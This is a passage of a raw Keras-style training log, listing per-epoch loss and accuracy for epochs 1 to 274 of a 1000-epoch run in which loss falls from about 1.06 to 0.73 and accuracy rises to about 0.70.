"Epoch 1/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0589 - accuracy: 0.6000\nEpoch 2/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0471 - accuracy: 0.6200\nEpoch 3/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0825 - accuracy: 0.6000\nEpoch 4/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.1239 - accuracy: 0.5400\nEpoch 5/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0694 - accuracy: 0.5800\nEpoch 6/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0496 - accuracy: 0.6000\nEpoch 7/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0503 - accuracy: 0.5800\nEpoch 8/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0366 - accuracy: 0.6200\nEpoch 9/1000\n10/10 [==============================] - 0s 7ms/step - loss: 1.0375 - accuracy: 0.6200\nEpoch 10/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0522 - accuracy: 0.6200\nEpoch 11/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0449 - accuracy: 0.5400\nEpoch 12/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0417 - accuracy: 0.5600\nEpoch 13/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0381 - accuracy: 0.6000\nEpoch 14/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0315 - accuracy: 0.6000\nEpoch 15/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0269 - accuracy: 0.5800\nEpoch 16/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0238 - accuracy: 0.6400\nEpoch 17/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0417 - accuracy: 0.5800\nEpoch 18/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0225 - accuracy: 0.5800\nEpoch 19/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0307 - accuracy: 0.6000\nEpoch 20/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0279 - accuracy: 0.6200\nEpoch 21/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0623 - accuracy: 0.5800\nEpoch 22/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0224 - accuracy: 0.6000\nEpoch 23/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0508 - accuracy: 0.6000\nEpoch 24/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0603 - accuracy: 0.5600\nEpoch 25/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0838 - accuracy: 0.6000\nEpoch 26/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.1077 - accuracy: 0.5800\nEpoch 27/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.1045 - accuracy: 0.5200\nEpoch 28/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0236 - accuracy: 0.5800\nEpoch 29/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0411 - accuracy: 0.5800\nEpoch 30/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0046 - accuracy: 0.6200\nEpoch 31/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0084 - accuracy: 0.6000\nEpoch 32/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0078 - accuracy: 0.6200\nEpoch 33/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9914 - accuracy: 0.6000\nEpoch 34/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0099 - accuracy: 0.6400\nEpoch 35/1000\n10/10 [==============================] - 0s 
5ms/step - loss: 0.9950 - accuracy: 0.6000\nEpoch 36/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0107 - accuracy: 0.6000\nEpoch 37/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0072 - accuracy: 0.6200\nEpoch 38/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9958 - accuracy: 0.5800\nEpoch 39/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0079 - accuracy: 0.6200\nEpoch 40/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9758 - accuracy: 0.6400\nEpoch 41/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9950 - accuracy: 0.6400\nEpoch 42/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9808 - accuracy: 0.6600\nEpoch 43/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0261 - accuracy: 0.6400\nEpoch 44/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0700 - accuracy: 0.5200\nEpoch 45/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0332 - accuracy: 0.5800\nEpoch 46/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0397 - accuracy: 0.5400\nEpoch 47/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0209 - accuracy: 0.6000\nEpoch 48/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9951 - accuracy: 0.6200\nEpoch 49/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9899 - accuracy: 0.6400\nEpoch 50/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9900 - accuracy: 0.6600\nEpoch 51/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9957 - accuracy: 0.6200\nEpoch 52/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9979 - accuracy: 0.6400\nEpoch 53/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9977 - accuracy: 0.6400\nEpoch 54/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0170 - accuracy: 0.6200\nEpoch 55/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9942 - accuracy: 0.6200\nEpoch 56/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9975 - accuracy: 0.6400\nEpoch 57/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9817 - accuracy: 0.6400\nEpoch 58/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0086 - accuracy: 0.6000\nEpoch 59/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9847 - accuracy: 0.5800\nEpoch 60/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9561 - accuracy: 0.6600\nEpoch 61/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9690 - accuracy: 0.6200\nEpoch 62/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9591 - accuracy: 0.6400\nEpoch 63/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9523 - accuracy: 0.6600\nEpoch 64/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9586 - accuracy: 0.6200\nEpoch 65/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9688 - accuracy: 0.6600\nEpoch 66/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9526 - accuracy: 0.6400\nEpoch 67/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9493 - accuracy: 0.6000\nEpoch 68/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9700 - accuracy: 0.6200\nEpoch 69/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9617 - accuracy: 0.6200\nEpoch 
70/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9757 - accuracy: 0.6400\nEpoch 71/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9425 - accuracy: 0.6600\nEpoch 72/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9623 - accuracy: 0.6400\nEpoch 73/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9708 - accuracy: 0.6000\nEpoch 74/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9401 - accuracy: 0.6600\nEpoch 75/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9318 - accuracy: 0.6600\nEpoch 76/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9471 - accuracy: 0.6200\nEpoch 77/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9357 - accuracy: 0.6600\nEpoch 78/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9493 - accuracy: 0.6600\nEpoch 79/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9515 - accuracy: 0.6400\nEpoch 80/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9271 - accuracy: 0.6600\nEpoch 81/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9274 - accuracy: 0.6400\nEpoch 82/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9420 - accuracy: 0.6200\nEpoch 83/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9195 - accuracy: 0.6400\nEpoch 84/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9508 - accuracy: 0.6200\nEpoch 85/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9273 - accuracy: 0.6400\nEpoch 86/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9502 - accuracy: 0.6200\nEpoch 87/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9619 - accuracy: 0.5800\nEpoch 88/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9289 - accuracy: 0.7000\nEpoch 89/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9511 - accuracy: 0.6400\nEpoch 90/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9273 - accuracy: 0.6600\nEpoch 91/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9307 - accuracy: 0.6000\nEpoch 92/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9551 - accuracy: 0.6400\nEpoch 93/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9460 - accuracy: 0.5800\nEpoch 94/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9258 - accuracy: 0.6600\nEpoch 95/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9471 - accuracy: 0.6200\nEpoch 96/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9150 - accuracy: 0.6600\nEpoch 97/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9085 - accuracy: 0.6600\nEpoch 98/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9074 - accuracy: 0.6400\nEpoch 99/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9373 - accuracy: 0.6200\nEpoch 100/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9292 - accuracy: 0.6400\nEpoch 101/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9612 - accuracy: 0.6200\nEpoch 102/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9117 - accuracy: 0.6400\nEpoch 103/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9007 - accuracy: 0.6600\nEpoch 104/1000\n10/10 [==============================] 
- 0s 5ms/step - loss: 0.9144 - accuracy: 0.6600\nEpoch 105/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9298 - accuracy: 0.6800\nEpoch 106/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9224 - accuracy: 0.6400\nEpoch 107/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9192 - accuracy: 0.6600\nEpoch 108/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9135 - accuracy: 0.6800\nEpoch 109/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9066 - accuracy: 0.6600\nEpoch 110/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.8941 - accuracy: 0.6400\nEpoch 111/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8944 - accuracy: 0.6600\nEpoch 112/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8819 - accuracy: 0.6200\nEpoch 113/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8878 - accuracy: 0.6400\nEpoch 114/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9046 - accuracy: 0.6800\nEpoch 115/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8952 - accuracy: 0.6600\nEpoch 116/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8926 - accuracy: 0.6600\nEpoch 117/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9030 - accuracy: 0.6600\nEpoch 118/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9088 - accuracy: 0.6400\nEpoch 119/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9018 - accuracy: 0.6400\nEpoch 120/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9260 - accuracy: 0.6200\nEpoch 121/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9424 - accuracy: 0.5800\nEpoch 122/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9588 - accuracy: 0.6400\nEpoch 123/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9040 - accuracy: 0.6000\nEpoch 124/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8853 - accuracy: 0.6400\nEpoch 125/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8712 - accuracy: 0.6800\nEpoch 126/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8698 - accuracy: 0.6400\nEpoch 127/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8716 - accuracy: 0.6600\nEpoch 128/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8688 - accuracy: 0.6600\nEpoch 129/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8725 - accuracy: 0.6600\nEpoch 130/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8671 - accuracy: 0.6400\nEpoch 131/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8961 - accuracy: 0.6600\nEpoch 132/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8869 - accuracy: 0.6400\nEpoch 133/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8791 - accuracy: 0.6800\nEpoch 134/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8618 - accuracy: 0.6800\nEpoch 135/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8591 - accuracy: 0.6600\nEpoch 136/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8688 - accuracy: 0.6800\nEpoch 137/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8813 - accuracy: 0.6400\nEpoch 138/1000\n10/10 [==============================] - 0s 5ms/step - 
loss: 0.8685 - accuracy: 0.6800\nEpoch 139/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8770 - accuracy: 0.6600\nEpoch 140/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8575 - accuracy: 0.6600\nEpoch 141/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8517 - accuracy: 0.7000\nEpoch 142/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8529 - accuracy: 0.6600\nEpoch 143/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8554 - accuracy: 0.6800\nEpoch 144/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8637 - accuracy: 0.6200\nEpoch 145/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8809 - accuracy: 0.6600\nEpoch 146/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9155 - accuracy: 0.6200\nEpoch 147/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8548 - accuracy: 0.6800\nEpoch 148/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8697 - accuracy: 0.6600\nEpoch 149/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8506 - accuracy: 0.6600\nEpoch 150/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8526 - accuracy: 0.6600\nEpoch 151/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9138 - accuracy: 0.6200\nEpoch 152/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8921 - accuracy: 0.6200\nEpoch 153/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8820 - accuracy: 0.6400\nEpoch 154/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8937 - accuracy: 0.6000\nEpoch 155/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9477 - accuracy: 0.6200\nEpoch 156/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0597 - accuracy: 0.5000\nEpoch 157/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0448 - accuracy: 0.6200\nEpoch 158/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9371 - accuracy: 0.6000\nEpoch 159/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9181 - accuracy: 0.6600\nEpoch 160/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8831 - accuracy: 0.6400\nEpoch 161/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8505 - accuracy: 0.6800\nEpoch 162/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8535 - accuracy: 0.6600\nEpoch 163/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8435 - accuracy: 0.6800\nEpoch 164/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8553 - accuracy: 0.6600\nEpoch 165/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8422 - accuracy: 0.7000\nEpoch 166/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8234 - accuracy: 0.6600\nEpoch 167/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8353 - accuracy: 0.6200\nEpoch 168/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8364 - accuracy: 0.6400\nEpoch 169/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8283 - accuracy: 0.6800\nEpoch 170/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8443 - accuracy: 0.6800\nEpoch 171/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8171 - accuracy: 0.7000\nEpoch 172/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8254 - 
accuracy: 0.6800\nEpoch 173/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8286 - accuracy: 0.6600\nEpoch 174/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8269 - accuracy: 0.6400\nEpoch 175/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8215 - accuracy: 0.6600\nEpoch 176/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.8468 - accuracy: 0.6800\nEpoch 177/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8431 - accuracy: 0.6600\nEpoch 178/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8222 - accuracy: 0.6600\nEpoch 179/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8219 - accuracy: 0.6400\nEpoch 180/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8196 - accuracy: 0.6800\nEpoch 181/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8053 - accuracy: 0.7000\nEpoch 182/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8283 - accuracy: 0.6800\nEpoch 183/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8157 - accuracy: 0.6800\nEpoch 184/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8090 - accuracy: 0.7000\nEpoch 185/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8086 - accuracy: 0.6800\nEpoch 186/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8081 - accuracy: 0.6800\nEpoch 187/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8010 - accuracy: 0.6400\nEpoch 188/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8309 - accuracy: 0.6600\nEpoch 189/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8214 - accuracy: 0.6800\nEpoch 190/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8292 - accuracy: 0.6800\nEpoch 191/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8243 - accuracy: 0.7000\nEpoch 192/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8118 - accuracy: 0.6800\nEpoch 193/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8080 - accuracy: 0.6400\nEpoch 194/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7990 - accuracy: 0.6800\nEpoch 195/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8075 - accuracy: 0.6800\nEpoch 196/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8159 - accuracy: 0.6800\nEpoch 197/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8058 - accuracy: 0.6800\nEpoch 198/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8140 - accuracy: 0.6800\nEpoch 199/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8020 - accuracy: 0.6200\nEpoch 200/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8109 - accuracy: 0.6600\nEpoch 201/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7833 - accuracy: 0.6800\nEpoch 202/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8158 - accuracy: 0.6600\nEpoch 203/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8066 - accuracy: 0.6800\nEpoch 204/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7956 - accuracy: 0.6600\nEpoch 205/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8159 - accuracy: 0.6800\nEpoch 206/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7863 - accuracy: 
0.7000\nEpoch 207/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8123 - accuracy: 0.6800\nEpoch 208/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8018 - accuracy: 0.6800\nEpoch 209/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8178 - accuracy: 0.6400\nEpoch 210/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8198 - accuracy: 0.6600\nEpoch 211/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8036 - accuracy: 0.6800\nEpoch 212/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7890 - accuracy: 0.6600\nEpoch 213/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7841 - accuracy: 0.7000\nEpoch 214/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8063 - accuracy: 0.6600\nEpoch 215/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7913 - accuracy: 0.6800\nEpoch 216/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.8033 - accuracy: 0.6800\nEpoch 217/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7803 - accuracy: 0.7000\nEpoch 218/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7843 - accuracy: 0.6600\nEpoch 219/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7690 - accuracy: 0.7000\nEpoch 220/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7751 - accuracy: 0.6800\nEpoch 221/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7791 - accuracy: 0.7000\nEpoch 222/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8186 - accuracy: 0.6200\nEpoch 223/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8084 - accuracy: 0.7000\nEpoch 224/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7902 - accuracy: 0.6600\nEpoch 225/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7915 - accuracy: 0.6800\nEpoch 226/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7757 - accuracy: 0.7000\nEpoch 227/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7866 - accuracy: 0.7000\nEpoch 228/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7918 - accuracy: 0.6800\nEpoch 229/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7782 - accuracy: 0.6800\nEpoch 230/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7667 - accuracy: 0.7000\nEpoch 231/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7656 - accuracy: 0.6800\nEpoch 232/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7775 - accuracy: 0.7000\nEpoch 233/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7669 - accuracy: 0.6800\nEpoch 234/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7658 - accuracy: 0.7000\nEpoch 235/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7672 - accuracy: 0.7000\nEpoch 236/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7599 - accuracy: 0.6800\nEpoch 237/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7943 - accuracy: 0.7000\nEpoch 238/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7959 - accuracy: 0.6800\nEpoch 239/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7576 - accuracy: 0.7000\nEpoch 240/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7609 - accuracy: 0.6800\nEpoch 
241/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7557 - accuracy: 0.7000\nEpoch 242/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7743 - accuracy: 0.6800\nEpoch 243/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7697 - accuracy: 0.7000\nEpoch 244/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7527 - accuracy: 0.7000\nEpoch 245/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7474 - accuracy: 0.6800\nEpoch 246/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7504 - accuracy: 0.7000\nEpoch 247/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8038 - accuracy: 0.6200\nEpoch 248/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7760 - accuracy: 0.6800\nEpoch 249/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7562 - accuracy: 0.6800\nEpoch 250/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7367 - accuracy: 0.7000\nEpoch 251/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7404 - accuracy: 0.7000\nEpoch 252/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7471 - accuracy: 0.7000\nEpoch 253/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7454 - accuracy: 0.7000\nEpoch 254/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7420 - accuracy: 0.6800\nEpoch 255/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7454 - accuracy: 0.6600\nEpoch 256/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7578 - accuracy: 0.6800\nEpoch 257/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7651 - accuracy: 0.6600\nEpoch 258/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7703 - accuracy: 0.6600\nEpoch 259/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7609 - accuracy: 0.6400\nEpoch 260/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7765 - accuracy: 0.6800\nEpoch 261/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7685 - accuracy: 0.6200\nEpoch 262/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7638 - accuracy: 0.7000\nEpoch 263/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7632 - accuracy: 0.7000\nEpoch 264/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7738 - accuracy: 0.6600\nEpoch 265/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.7457 - accuracy: 0.7000\nEpoch 266/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7644 - accuracy: 0.6800\nEpoch 267/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7585 - accuracy: 0.6800\nEpoch 268/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7620 - accuracy: 0.6800\nEpoch 269/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7464 - accuracy: 0.7000\nEpoch 270/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7444 - accuracy: 0.6800\nEpoch 271/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7315 - accuracy: 0.6800\nEpoch 272/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7390 - accuracy: 0.6800\nEpoch 273/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7222 - accuracy: 0.6800\nEpoch 274/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7323 - accuracy: 0.7000\nEpoch 275/1000\n10/10 
